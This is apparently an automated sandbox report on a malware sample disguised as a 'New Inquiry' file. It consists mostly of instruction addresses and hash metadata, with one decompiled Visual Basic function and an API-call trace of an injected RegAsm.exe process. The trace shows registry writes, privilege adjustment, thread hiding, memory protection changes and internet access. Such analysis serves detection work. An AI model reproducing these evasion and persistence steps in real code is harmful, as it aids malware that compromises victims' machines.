                                  0x00401725
                                  0x00401728
                                  0x0040172a
                                  0x0040172b
                                  0x0040172d
                                  0x00401730
                                  0x00401732
                                  0x00401734
                                  0x00401736
                                  0x00401738
                                  0x0040173a
                                  0x0040173c
                                  0x0040173e
                                  0x00401740
                                  0x00401742
                                  0x00401744
                                  0x00401746
                                  0x00401748
                                  0x0040174a
                                  0x0040174c
                                  0x0040174e
                                  0x00401750
                                  0x00401752
                                  0x00401754
                                  0x00401756
                                  0x00401758
                                  0x0040175a
                                  0x0040175c
                                  0x0040175e
                                  0x00401760
                                  0x00401762
                                  0x00401764
                                  0x00401766
                                  0x00401768
                                  0x0040176a
                                  0x0040176c
                                  0x0040176e
                                  0x00401770
                                  0x00401772
                                  0x00401774
                                  0x00401776
                                  0x00401778
                                  0x0040177a
                                  0x0040177c
                                  0x0040177e
                                  0x00401780
                                  0x00401782
                                  0x00401784
                                  0x00401786
                                  0x00401788
                                  0x0040178a
                                  0x0040178c
                                  0x0040178e
                                  0x00401790
                                  0x00401792
                                  0x00401794
                                  0x00401796
                                  0x00401798
                                  0x0040179a
                                  0x0040179c
                                  0x0040179e
                                  0x004017a0
                                  0x004017a2
                                  0x004017a4
                                  0x004017a6
                                  0x004017a8
                                  0x004017aa
                                  0x004017ac
                                  0x004017ae
                                  0x004017b0
                                  0x004017b2
                                  0x004017b4
                                  0x004017b6
                                  0x004017b8
                                  0x004017ba
                                  0x004017bc
                                  0x004017be
                                  0x004017c0
                                  0x004017c2
                                  0x004017c4
                                  0x004017c6
                                  0x004017c8
                                  0x004017ca
                                  0x004017cc
                                  0x004017ce
                                  0x004017d0
                                  0x004017d2
                                  0x004017d4
                                  0x004017d6
                                  0x004017d8
                                  0x004017da
                                  0x004017dc
                                  0x004017de
                                  0x004017e0
                                  0x004017e2
                                  0x004017e4
                                  0x004017e6
                                  0x004017e8
                                  0x004017ea
                                  0x004017ec
                                  0x004017ee
                                  0x004017f0
                                  0x004017f2
                                  0x004017f4
                                  0x004017f6
                                  0x004017f8
                                  0x004017fa
                                  0x004017fc
                                  0x004017fe
                                  0x00401800
                                  0x00401802
                                  0x00401804
                                  0x00401806
                                  0x00401808
                                  0x0040180a
                                  0x0040180c
                                  0x0040180e
                                  0x00401810
                                  0x00401812
                                  0x00401814
                                  0x00401816
                                  0x00401818
                                  0x0040181a
                                  0x0040181c
                                  0x0040181e
                                  0x00401820
                                  0x00401822
                                  0x00401824
                                  0x00401826
                                  0x00401828
                                  0x0040182a
                                  0x0040182c
                                  0x0040182e
                                  0x00401830
                                  0x00401832
                                  0x00401834
                                  0x00401836
                                  0x00401838
                                  0x0040183a
                                  0x0040183c
                                  0x0040183e
                                  0x00401840
                                  0x00401842
                                  0x00401844
                                  0x00401846
                                  0x00401848
                                  0x0040184a
                                  0x0040184c
                                  0x0040184e
                                  0x00401850
                                  0x00401852
                                  0x00401854
                                  0x00401856
                                  0x00401858
                                  0x0040185a
                                  0x0040185c
                                  0x0040185e
                                  0x00401860
                                  0x00401862
                                  0x00401864
                                  0x00401866
                                  0x00401868
                                  0x0040186a
                                  0x0040186c
                                  0x0040186e
                                  0x00401870
                                  0x00401872
                                  0x00401874
                                  0x00401876
                                  0x00401878
                                  0x0040187a
                                  0x0040187c
                                  0x0040187e
                                  0x00401880
                                  0x00401882
                                  0x00401884
                                  0x00401886
                                  0x00401888
                                  0x0040188a
                                  0x0040188c
                                  0x0040188e
                                  0x00401890
                                  0x00401892
                                  0x00401894
                                  0x00401896
                                  0x00401898
                                  0x0040189a
                                  0x0040189c
                                  0x0040189e
                                  0x004018a0
                                  0x004018a2
                                  0x004018a4
                                  0x004018a6
                                  0x004018a8
                                  0x004018aa
                                  0x004018ac
                                  0x004018ae
                                  0x004018b0
                                  0x004018b2
                                  0x004018b4
                                  0x004018b6
                                  0x004018b8
                                  0x004018ba
                                  0x004018bc
                                  0x004018be
                                  0x004018c0
                                  0x004018c2
                                  0x004018c4
                                  0x004018c6
                                  0x004018c8
                                  0x004018ca
                                  0x004018cc
                                  0x004018ce
                                  0x004018d0
                                  0x004018d2
                                  0x004018d4
                                  0x004018d6
                                  0x004018d8
                                  0x004018da
                                  0x004018dc
                                  0x004018de
                                  0x004018e0
                                  0x004018e2
                                  0x004018e4
                                  0x004018e6
                                  0x004018e8
                                  0x004018ea
                                  0x004018ec
                                  0x004018ee
                                  0x004018f0
                                  0x004018f2
                                  0x004018f4
                                  0x004018f6
                                  0x004018f8
                                  0x004018fa
                                  0x004018fc
                                  0x004018fe
                                  0x00401900
                                  0x00401902
                                  0x00401904
                                  0x00401906
                                  0x00401908
                                  0x0040190a
                                  0x0040190c
                                  0x0040190e
                                  0x00401910
                                  0x00401912
                                  0x00401914
                                  0x00401916
                                  0x00401918
                                  0x0040191a
                                  0x0040191c
                                  0x0040191e
                                  0x00401920
                                  0x00401922
                                  0x00401924
                                  0x00401926
                                  0x00401928
                                  0x0040192a
                                  0x0040192c
                                  0x0040192e
                                  0x00401930
                                  0x00401932
                                  0x00401934
                                  0x00401936
                                  0x00401938
                                  0x0040193a
                                  0x0040193c
                                  0x0040193e
                                  0x00401942
                                  0x00401943
                                  0x00401945
                                  0x00401947
                                  0x00401949
                                  0x0040194b
                                  0x0040194d
                                  0x0040194f
                                  0x00401951
                                  0x00401953
                                  0x00401955
                                  0x0040195a
                                  0x0040195c
                                  0x0040195e
                                  0x00401960
                                  0x00401966
                                  0x00401967
                                  0x00401969
                                  0x0040196b
                                  0x0040196b
                                  0x0040196d
                                  0x0040196f
                                  0x00401971
                                  0x00401973
                                  0x00401975
                                  0x00401977
                                  0x00401979
                                  0x0040197b
                                  0x0040197d
                                  0x00401980
                                  0x00401982
                                  0x00401984
                                  0x00401986
                                  0x00401987
                                  0x00401989
                                  0x0040198b
                                  0x0040198d
                                  0x00401990
                                  0x00401992
                                  0x00401994
                                  0x00401998
                                  0x0040199a
                                  0x0040199c
                                  0x0040199e
                                  0x0040199f
                                  0x004019a5
                                  0x004019a8
                                  0x004019aa
                                  0x004019ac
                                  0x004019b1
                                  0x004019b4
                                  0x004019b6
                                  0x004019b7
                                  0x004019b9
                                  0x004019bb
                                  0x004019bb
                                  0x004019bb
                                  0x004019be
                                  0x004019c0
                                  0x004019c2
                                  0x004019c3
                                  0x004019ca
                                  0x004019ce
                                  0x004019d1
                                  0x004019d2
                                  0x004019d3
                                  0x004019d5
                                  0x004019d7
                                  0x004019d9
                                  0x004019db
                                  0x004019dd
                                  0x004019df
                                  0x004019df
                                  0x004019df
                                  0x004019df
                                  0x004019e1
                                  0x004019e5
                                  0x004019e7
                                  0x004019e7
                                  0x004019e7
                                  0x004019e8
                                  0x004019e9
                                  0x004019ea
                                  0x004019eb
                                  0x004019eb
                                  0x004019eb
                                  0x004019f0
                                  0x004019f1
                                  0x004019f3
                                  0x004019f5
                                  0x004019f7
                                  0x004019fe
                                  0x00401a00
                                  0x00401a02
                                  0x00401a04
                                  0x00401a06
                                  0x00401a08
                                  0x00401a09
                                  0x00401a0f
                                  0x00401a12
                                  0x00401a13
                                  0x00401a15
                                  0x00401a17
                                  0x00401a1a
                                  0x00401a1c
                                  0x00401a1e
                                  0x00401a22
                                  0x00401a23
                                  0x00401a26
                                  0x00401a28
                                  0x00401a2a
                                  0x00401a2c
                                  0x00401a2e
                                  0x00401a30
                                  0x00401a31
                                  0x00401a34
                                  0x00401a37
                                  0x00401a3a
                                  0x00401a3b
                                  0x00401a40
                                  0x00401a41
                                  0x00401a43
                                  0x00401a46
                                  0x00401a48
                                  0x00401a49
                                  0x00401a4c
                                  0x00401a4e
                                  0x00401a50
                                  0x00401a52
                                  0x00401a54
                                  0x00401a56
                                  0x00401a58
                                  0x00401a5a
                                  0x00401a5b
                                  0x00401a5b
                                  0x00401a5b
                                  0x00401a5e
                                  0x00401a61
                                  0x00401a64
                                  0x00401a66
                                  0x00401a68
                                  0x00401a69
                                  0x00401a6b
                                  0x00401a6f
                                  0x00401a76
                                  0x00401a78
                                  0x00401a7a
                                  0x00401a7c
                                  0x00401a7e
                                  0x00401a87
                                  0x00401a8b
                                  0x00401a8d
                                  0x00401a8f
                                  0x00401a91
                                  0x00401a93
                                  0x00401a95
                                  0x00401a99
                                  0x00401a9c
                                  0x00401a9d
                                  0x00401aa0
                                  0x00401aa3
                                  0x00401aa9
                                  0x00401aac
                                  0x00401aae
                                  0x00401ab0
                                  0x00401ab2
                                  0x00401ab4
                                  0x00401ab6
                                  0x00401ab8
                                  0x00401aba
                                  0x00401abc
                                  0x00401abe
                                  0x00401ac0
                                  0x00401ac2
                                  0x00401ac4
                                  0x00401ac6
                                  0x00401ac8
                                  0x00401aca
                                  0x00401acc
                                  0x00401ace
                                  0x00401ad0
                                  0x00401ad2
                                  0x00401ad4
                                  0x00401ad6
                                  0x00401ad8
                                  0x00401ada
                                  0x00401adc
                                  0x00401ade
                                  0x00401ae0
                                  0x00401ae2
                                  0x00401ae4
                                  0x00401ae6
                                  0x00401ae8
                                  0x00401aea
                                  0x00401aec
                                  0x00401aee
                                  0x00401af0
                                  0x00401af2
                                  0x00401af4
                                  0x00401af6
                                  0x00401af8
                                  0x00401afa
                                  0x00401afc
                                  0x00401b00
                                  0x00401b01
                                  0x00401b04
                                  0x00401b07
                                  0x00401b0d
                                  0x00401b10
                                  0x00401b12
                                  0x00401b14
                                  0x00401b16
                                  0x00401b18
                                  0x00401b1a
                                  0x00401b1c
                                  0x00401b1e
                                  0x00401b20
                                  0x00401b22
                                  0x00401b24
                                  0x00401b26
                                  0x00401b28
                                  0x00401b2a
                                  0x00401b2c
                                  0x00401b2e
                                  0x00401b30
                                  0x00401b32
                                  0x00401b34
                                  0x00401b36
                                  0x00401b38
                                  0x00401b3a
                                  0x00401b3c
                                  0x00401b3e
                                  0x00401b40
                                  0x00401b42
                                  0x00401b44
                                  0x00401b46
                                  0x00401b48
                                  0x00401b4a
                                  0x00401b4c
                                  0x00401b4e
                                  0x00401b50
                                  0x00401b52
                                  0x00401b54
                                  0x00401b56
                                  0x00401b58
                                  0x00401b5a
                                  0x00401b5c
                                  0x00401b5e
                                  0x00401b60
                                  0x00401b62
                                  0x00401b63
                                  0x00401b66
                                  0x00401b67
                                  0x00401b6d
                                  0x00401b70
                                  0x00401b72
                                  0x00401b73
                                  0x00401b75
                                  0x00401b77
                                  0x00401b79
                                  0x00401b7b
                                  0x00401b7d
                                  0x00401b7f
                                  0x00401b81
                                  0x00401b83
                                  0x00401b85
                                  0x00401b87
                                  0x00401b89
                                  0x00401b8b
                                  0x00401b8d
                                  0x00401b8f
                                  0x00401b91
                                  0x00401b93
                                  0x00401b95
                                  0x00401b97
                                  0x00401b99
                                  0x00401b9b
                                  0x00401b9d
                                  0x00401b9f
                                  0x00401ba1
                                  0x00401ba3
                                  0x00401ba5
                                  0x00401ba7
                                  0x00401ba9
                                  0x00401bab
                                  0x00401bad
                                  0x00401baf
                                  0x00401bb1
                                  0x00401bb3
                                  0x00401bb5
                                  0x00401bb7
                                  0x00401bb9
                                  0x00401bbb
                                  0x00401bbd
                                  0x00401bbf
                                  0x00401bc1
                                  0x00401bc3
                                  0x00401bc5
                                  0x00401bc7
                                  0x00401bc9
                                  0x00401bcb
                                  0x00401bcd
                                  0x00401bcf
                                  0x00401bd1
                                  0x00401bd3
                                  0x00401bd5
                                  0x00401bd7
                                  0x00401bda
                                  0x00401bdb
                                  0x00401bde
                                  0x00401bdf
                                  0x00401be5
                                  0x00401be8
                                  0x00401bea
                                  0x00401beb
                                  0x00401bed
                                  0x00401bef
                                  0x00401bf1
                                  0x00401bf3
                                  0x00401bf5
                                  0x00401bf7
                                  0x00401bf9
                                  0x00401bfb
                                  0x00401bfd
                                  0x00401bff
                                  0x00401c01
                                  0x00401c03
                                  0x00401c05
                                  0x00401c07
                                  0x00401c09
                                  0x00401c0b
                                  0x00401c0d
                                  0x00401c0f
                                  0x00401c11
                                  0x00401c13
                                  0x00401c15
                                  0x00401c17
                                  0x00401c19
                                  0x00401c1b
                                  0x00401c1d
                                  0x00401c1f
                                  0x00401c21
                                  0x00401c23
                                  0x00401c25
                                  0x00401c27
                                  0x00401c29
                                  0x00401c2b
                                  0x00401c2d
                                  0x00401c2f
                                  0x00401c31
                                  0x00401c33
                                  0x00401c35
                                  0x00401c37
                                  0x00401c39
                                  0x00401c3b
                                  0x00401c3d
                                  0x00401c3f
                                  0x00401c41
                                  0x00401c43
                                  0x00401c45
                                  0x00401c47
                                  0x00401c49
                                  0x00401c4b
                                  0x00401c4d
                                  0x00401c4f
                                  0x00401c51
                                  0x00401c53
                                  0x00401c55
                                  0x00401c57
                                  0x00401c59
                                  0x00401c5b
                                  0x00401c5d
                                  0x00401c5f
                                  0x00401c61
                                  0x00401c63
                                  0x00401c65
                                  0x00401c67
                                  0x00401c69
                                  0x00401c6b
                                  0x00401c6b
                                  0x00401c6b
                                  0x00401c71
                                  0x00401c74
                                  0x00401c77
                                  0x00401c7d
                                  0x00401c80
                                  0x00401c82
                                  0x00401c84
                                  0x00401c86
                                  0x00401c88
                                  0x00401c8a
                                  0x00401c8c
                                  0x00401c8e
                                  0x00401c90
                                  0x00401c92
                                  0x00401c94
                                  0x00401c96
                                  0x00401c98
                                  0x00401c9a
                                  0x00401c9c
                                  0x00401c9e
                                  0x00401ca0
                                  0x00401ca2
                                  0x00401ca4
                                  0x00401ca6
                                  0x00401ca8
                                  0x00401caa
                                  0x00401cac
                                  0x00401cae
                                  0x00401cb0
                                  0x00401cb2
                                  0x00401cb4
                                  0x00401cb6
                                  0x00401cb8
                                  0x00401cba
                                  0x00401cbc
                                  0x00401cbe
                                  0x00401cc0
                                  0x00401cc2
                                  0x00401cc4
                                  0x00401cc6
                                  0x00401cc8
                                  0x00401cca
                                  0x00401ccc
                                  0x004105e7
                                  0x004105f6
                                  0x00410600
                                  0x00410608
                                  0x0041060b
                                  0x00410618
                                  0x00410620
                                  0x0041062b
                                  0x0041062e
                                  0x00410635
                                  0x0041064f
                                  0x00410637
                                  0x00410637
                                  0x0041063c
                                  0x00410641
                                  0x00410646
                                  0x00410646
                                  0x0041065b
                                  0x0041066a
                                  0x0041066d
                                  0x0041066f
                                  0x00410672
                                  0x00410676
                                  0x0041068f
                                  0x0041068f
                                  0x0041068f
                                  0x00410678
                                  0x00410678
                                  0x0041067a
                                  0x0041067f
                                  0x00410682
                                  0x00410685
                                  0x0041068a
                                  0x0041068a
                                  0x00410696
                                  0x004106a5
                                  0x004106a8
                                  0x004106aa
                                  0x004106ad
                                  0x004106b1
                                  0x004106ca
                                  0x004106ca
                                  0x004106ca
                                  0x004106b3
                                  0x004106b3
                                  0x004106b5
                                  0x004106ba
                                  0x004106bd
                                  0x004106c0
                                  0x004106c5
                                  0x004106c5
                                  0x004106d1
                                  0x004106d4
                                  0x004106de
                                  0x004106e6
                                  0x004106f7
                                  0x004106fd
                                  0x004106ff
                                  0x00410702
                                  0x00410706
                                  0x00410722
                                  0x00410722
                                  0x00410722
                                  0x00410708
                                  0x00410708
                                  0x0041070d
                                  0x00410712
                                  0x00410715
                                  0x00410718
                                  0x0041071d
                                  0x0041071d
                                  0x00410726
                                  0x00410728
                                  0x0041072a
                                  0x0041072d
                                  0x00410730
                                  0x00410731
                                  0x00410739
                                  0x0041073a
                                  0x0041073f
                                  0x00410745
                                  0x0041074d
                                  0x00410752
                                  0x00410757
                                  0x0041075e
                                  0x00410781
                                  0x00410789
                                  0x0041078e
                                  0x004011b8
                                  0x004011b8
                                  0x004011b8

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24036576698.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.24036522568.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000003.00000002.24036687091.0000000000411000.00000004.00020000.sdmp Download File
                                  • Associated: 00000003.00000002.24036753540.0000000000413000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID: #100
                                  • String ID: VB5!6&*
                                  • API String ID: 1341478452-3593831657
                                  • Opcode ID: 4d8cb2d3f81444f5cb99dfa7fd9710e90a9e34f4963007c297919c59f9fe458b
                                  • Instruction ID: aa754eb57dd15ec0aef5cc63c44c39ddb5d135e13c13bfd1b46676cc5d04ed35
                                  • Opcode Fuzzy Hash: 4d8cb2d3f81444f5cb99dfa7fd9710e90a9e34f4963007c297919c59f9fe458b
                                  • Instruction Fuzzy Hash: A2D0A49588E3C22ED3072275082245A3F31095B6A239E41EBD0A0EE8F3E1AC4959C32A
                                  Uniqueness

                                  Uniqueness Score: 1.25%

                                  Non-executed Functions

                                  Function 02240A3F, Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24038739824.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_2240000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2768ccaee01506907b3031a94b546294cf9f301d5795d432e8b2cfca0e0beeb0
                                  • Instruction ID: 5dcbdfc15b004cc4b8d83867f7d6d9e8136785e8e9c782f0ed5111fce50e8153
                                  • Opcode Fuzzy Hash: 2768ccaee01506907b3031a94b546294cf9f301d5795d432e8b2cfca0e0beeb0
                                  • Instruction Fuzzy Hash: 812166725246939FDB278678C8467D0BFE0EB063147195A89C6818F183D31A515BCF82
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 02240AA2, Relevance: .0, Instructions: 47COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24038739824.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_2240000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3dd1c2e588d1a0c4da992bc5ea56af7046ebaaca36f0d30ddd6c4c4f6cbeac3
                                  • Instruction ID: 7723c52281215d0d31817466ecdde85184003831dd462841636116c420a210c9
                                  • Opcode Fuzzy Hash: a3dd1c2e588d1a0c4da992bc5ea56af7046ebaaca36f0d30ddd6c4c4f6cbeac3
                                  • Instruction Fuzzy Hash: A30178725643938FC7335778C452AC0BBB4EB163187149A98C8D68F193C3181053CF92
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 004107AE, Relevance: 6.0, APIs: 4, Instructions: 49UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 23 4107ae-4107e2 __vbaChkstk 24 4107e4-4107fa __vbaNew2 23->24 25 4107fc 23->25 26 410803-410824 24->26 25->26 28 410840 26->28 29 410826-41083e __vbaHresultCheckObj 26->29 30 410844-410858 call 402673 __vbaFreeStr 28->30 29->30
                                  C-Code - Quality: 47%
                                  			E004107AE(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v56;
				signed int _v60;
				signed int _t24;
				void* _t25;
				void* _t29;
				intOrPtr _t34;
				void* _t37;

				_t31 = __esi;
				_t30 = __edi;
				_t27 = __ecx;
				_t26 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_push(0x4010c6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_push(0x28);
				L004010C0();
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = _t34;
				_v8 = 0x4010a8;
				if( *0x411010 != 0) {
					_v56 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x401948);
					L00401174();
					_v56 = 0x411010;
				}
				_v44 =  *_v56;
				_t24 =  *((intOrPtr*)( *_v44 + 0x1bc))(_v44, 0);
				asm("fclex");
				_v48 = _t24;
				if(_v48 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x401f54);
					_push(_v44);
					_push(_v48);
					L0040116E();
					_v60 = _t24;
				}
				_t25 = L00402673(_t24, _t26, _t27, _t29, _t30, _t31, _t37);
				_push(E00410859);
				L00401150();
				return _t25;
			}















                                  0x004107ae
                                  0x004107ae
                                  0x004107ae
                                  0x004107ae
                                  0x004107b1
                                  0x004107b2
                                  0x004107b3
                                  0x004107be
                                  0x004107bf
                                  0x004107c6
                                  0x004107c9
                                  0x004107ce
                                  0x004107cf
                                  0x004107d0
                                  0x004107d1
                                  0x004107d4
                                  0x004107e2
                                  0x004107fc
                                  0x004107e4
                                  0x004107e4
                                  0x004107e9
                                  0x004107ee
                                  0x004107f3
                                  0x004107f3
                                  0x00410808
                                  0x00410815
                                  0x0041081b
                                  0x0041081d
                                  0x00410824
                                  0x00410840
                                  0x00410826
                                  0x00410826
                                  0x0041082b
                                  0x00410830
                                  0x00410833
                                  0x00410836
                                  0x0041083b
                                  0x0041083b
                                  0x00410844
                                  0x00410849
                                  0x00410853
                                  0x00410858

                                  APIs
                                  • __vbaChkstk.MSVBVM60(00000000,004010C6,?,?,?,00410757,00000000,?,?,?,004010C6), ref: 004107C9
                                  • __vbaNew2.MSVBVM60(00401948,00411010,?,?,?,00000000,004010C6,?,?,?,00410757), ref: 004107EE
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401F54,000001BC), ref: 00410836
                                  • __vbaFreeStr.MSVBVM60(00410859), ref: 00410853
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24036576698.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.24036522568.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000003.00000002.24036687091.0000000000411000.00000004.00020000.sdmp Download File
                                  • Associated: 00000003.00000002.24036753540.0000000000413000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID: __vba$CheckChkstkFreeHresultNew2
                                  • String ID:
                                  • API String ID: 4127847336-0
                                  • Opcode ID: 9b3847193618ab2bc30815ff975c85f412867dc867ad22866b2cd7a15ab5917b
                                  • Instruction ID: 058696c4c43b0ce3c50059c63063b7da128e561d0ec1160893236ba59c8f909c
                                  • Opcode Fuzzy Hash: 9b3847193618ab2bc30815ff975c85f412867dc867ad22866b2cd7a15ab5917b
                                  • Instruction Fuzzy Hash: CC114870E41248AFDB10EF95C846BDDBBB4EB08754F20442AF100766A0C3BD58C49B68
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Analysis Process: RegAsm.exe PID: 1440 Parent PID: 6652 RegAsm.exeUNIQUE

                                  Execution Graph

                                  Execution Coverage:9.7%
                                  Dynamic/Decrypted Code Coverage:18.4%
                                  Signature Coverage:50.6%
                                  Total number of Nodes:707
                                  Total number of Limit Nodes:8

                                  Graph

                                  execution_graph 12442 204f2c0e 12443 204f2c3a K32EnumProcesses 12442->12443 12445 204f2c56 12443->12445 11776 1db1a6b2 11777 1db1a6ea RegOpenKeyExW 11776->11777 11779 1db1a740 11777->11779 12446 1db1a172 EnumWindows 12447 1db1a1c4 12446->12447 11780 204f1846 11781 204f187b GetProcessTimes 11780->11781 11783 204f18ad 11781->11783 11784 1db1a7ba 11785 1db1a7ef RegQueryValueExW 11784->11785 11787 1db1a843 11785->11787 12448 1db1a97a 12449 1db1a9af RegSetValueExW 12448->12449 12451 1db1a9fb 12449->12451 12452 1db1bc7a 12454 1db1bca0 CreateDirectoryW 12452->12454 12455 1db1bcc7 12454->12455 11788 204f015e 11789 204f0187 CopyFileW 11788->11789 11791 204f01ae 11789->11791 12456 1fee22bd 12457 1fee1e5c 12456->12457 12458 1fee23a5 12457->12458 12461 1fee3da8 12457->12461 12465 1fee3da3 12457->12465 12462 1fee3dc9 12461->12462 12469 1fee4043 12462->12469 12466 1fee3da8 12465->12466 12468 1fee4043 2 API calls 12466->12468 12467 1fee3eca 12467->12457 12468->12467 12470 1fee406c 12469->12470 12471 1fee3eca 12470->12471 12474 204f204d 12470->12474 12478 204f208a 12470->12478 12471->12457 12475 204f208a SetKernelObjectSecurity 12474->12475 12477 204f20d2 12475->12477 12477->12470 12479 204f20b0 SetKernelObjectSecurity 12478->12479 12481 204f20d2 12479->12481 12481->12470 11792 204f13da 11793 204f1412 MapViewOfFile 11792->11793 11795 204f1461 11793->11795 11796 204f12da 11798 204f1312 OpenFileMappingW 11796->11798 11799 204f134d 11798->11799 11800 f04c66 11805 f04c80 CreateFileA 11800->11805 11802 f04c71 11806 f08799 11802->11806 11804 f08aa5 11805->11802 11807 f087ae GetPEB 11806->11807 11808 f087bc 11807->11808 11808->11804 11809 1db1ab26 11812 1db1ab5e CreateFileW 11809->11812 11811 1db1abad 11812->11811 11813 1db1adaa 11815 1db1addf WriteFile 11813->11815 11816 1db1ae11 11815->11816 12482 1db1acea 12483 1db1ad1f GetFileType 12482->12483 12485 1db1ad4c 12483->12485 11817 f093ed 11818 f081cf 11817->11818 11825 f09402 11817->11825 11819 f0822b LoadLibraryA 11818->11819 11820 f08799 GetPEB 11818->11820 11821 f08235 11819->11821 11822 f081ed 11820->11822 11823 f08219 11822->11823 11824 f08799 GetPEB 11822->11824 11823->11819 11826 f08204 11824->11826 11826->11823 11827 f08799 GetPEB 11826->11827 11827->11823 11828 204f07d2 11829 204f080a LsaOpenPolicy 11828->11829 11831 204f084b 11829->11831 11832 204f2cd2 11833 204f2d07 NtQuerySystemInformation 11832->11833 11834 204f2d32 11832->11834 11835 204f2d1c 11833->11835 11834->11833 12486 204f2912 12488 204f293b LookupPrivilegeValueW 12486->12488 12489 204f2962 12488->12489 12490 204f2a92 12491 204f2ac1 AdjustTokenPrivileges 12490->12491 12493 204f2ae3 12491->12493 11836 f02b50 11837 f02f69 TerminateThread 11836->11837 11839 f04bb7 11837->11839 11846 f02b4a 11839->11846 11847 f02f54 TerminateThread 11846->11847 11849 f04bb7 11847->11849 11850 f02b4a 24 API calls 11849->11850 11852 f04bbc 11850->11852 11853 f0a80b 11852->11853 11856 f08fc5 11852->11856 11854 f0a810 11853->11854 11859 f02a91 11853->11859 11857 f08799 GetPEB 11856->11857 11858 f08fd8 11857->11858 11858->11852 11860 f02aa5 11859->11860 11860->11860 11861 f02aaf GetPEB 11860->11861 11874 f09eee 11861->11874 11876 f09ef3 11874->11876 11877 f09ef8 11876->11877 11877->11877 11878 f08fc5 GetPEB 11877->11878 11884 f0a308 11878->11884 11879 f081cf LoadLibraryA GetPEB 11909 f0062c 11879->11909 11880 f0949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 11880->11909 11883 f00aae NtSetInformationThread 11885 f081cf 2 API calls 11883->11885 11887 f0a7b1 11884->11887 11889 f0a7f4 11884->11889 11884->11909 11885->11909 11886 f0a7d8 CreateFileW 11886->11887 11887->11886 11887->11887 11887->11889 11888 f03189 11891 f09eee 23 API calls 11888->11891 11892 f0452b 11888->11892 11889->11889 11898 f03601 11891->11898 11893 f03df6 11894 f03e07 11893->11894 11895 f09eee 23 API calls 11893->11895 11896 f09eee 23 API calls 11894->11896 11895->11894 11897 f03e15 11896->11897 11899 f09eee 23 API calls 11897->11899 11898->11893 11901 f09eee 23 API calls 11898->11901 11900 f03e2d 11899->11900 11903 f09eee 23 API calls 11900->11903 11902 f03723 11901->11902 11902->11893 11906 f09eee 23 API calls 11902->11906 11905 f03e44 11903->11905 11904 f09eee 23 API calls 11904->11909 11907 f03761 11906->11907 11907->11893 11908 f09eee 23 API calls 11907->11908 11929 f037c7 11908->11929 11909->11879 11909->11880 11909->11888 11909->11904 11910 f08a84 11909->11910 11913 f010ea 11909->11913 11916 f011bf 11909->11916 11943 f04c36 11909->11943 11946 f081cf 11909->11946 11956 f04109 GetPEB 11909->11956 11958 f07ce8 11909->11958 11990 f01864 11909->11990 11994 f017bf 11909->11994 12002 f01719 11909->12002 12071 f01dbc 11909->12071 11912 f08799 GetPEB 11910->11912 11914 f08aa5 11912->11914 11919 f01100 11913->11919 11961 f03189 11913->11961 11918 f011de 11916->11918 11920 f011d1 11916->11920 11923 f01864 GetLongPathNameW 11916->11923 11918->11919 11921 f05a43 11918->11921 11926 f09eee 23 API calls 11919->11926 11920->11918 12081 f01d3f 11920->12081 12087 f011f0 11921->12087 11923->11920 11925 f05a48 11934 f05a58 11925->11934 12152 f052b9 InternetOpenA 11925->12152 11928 f04107 11926->11928 11929->11893 11933 f09eee 23 API calls 11929->11933 11935 f03952 11933->11935 11935->11893 11936 f09eee 23 API calls 11935->11936 11937 f03d94 11936->11937 11937->11893 11938 f03d9b 11937->11938 11939 f09eee 23 API calls 11938->11939 11940 f03db6 11939->11940 11941 f09eee 23 API calls 11940->11941 11942 f03dce 11941->11942 11944 f081cf 2 API calls 11943->11944 11945 f04c43 11944->11945 11945->11909 11947 f081e1 11946->11947 11948 f0822b LoadLibraryA 11946->11948 11949 f08799 GetPEB 11947->11949 11950 f08235 11948->11950 11951 f081ed 11949->11951 11950->11883 11952 f08799 GetPEB 11951->11952 11953 f08219 11951->11953 11954 f08204 11952->11954 11953->11948 11954->11953 11955 f08799 GetPEB 11954->11955 11955->11953 11957 f04517 11956->11957 11957->11909 12167 f081b7 GetPEB 11958->12167 11960 f07ced 11962 f031e1 11961->11962 11963 f09eee 25 API calls 11962->11963 11964 f0452b 11962->11964 11970 f03601 11963->11970 11964->11913 11965 f03df6 11966 f03e07 11965->11966 11967 f09eee 25 API 